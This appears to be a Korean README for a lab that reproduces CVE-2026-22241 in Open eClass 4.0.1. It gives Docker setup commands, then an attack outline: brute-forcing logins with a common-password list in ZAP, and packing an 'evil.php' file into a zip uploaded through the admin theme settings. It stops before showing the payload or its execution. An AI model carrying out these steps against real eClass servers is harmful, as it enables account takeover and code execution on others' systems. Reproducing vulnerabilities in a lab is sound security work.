
CVE-2026-22241을 위한 실습 환경
CVE-2026-22241 실습 환경
sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git
https://www.openeclass.org/en/previous-versions/를 열고 openeclass-4.0.1.zip을 다운로드하세요.
sudo apt update && sudo apt install docker.io docker-compose -y
sudp systemctl start docker
sudo cp openeclass-4.0.1.zip CVE-2026-22241
cd CVE-2026-22241
sudo mkdir html
sudo unzip openeclass-4.0.1.zip -d ./temp_folder
sudo mv ./temp_folder/openeclass-4.0.1/* ./html/
sudo rm -rf ./temp_folder
sudo rm -rf openeclass-4.0.1.zip
sudo chown -R $USER:www-data html/
sudo chmod -R 775 html/
sudo docker-compose up -d
sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"
sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web
ZAP (무차별 대입) 키 목록: https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt
zip poc.zip evil.php
eclass 페이지에서: 관리 도구 -> 테마 설정으로 이동한 다음 poc.zip을 업로드하세요.
새 페이지에서: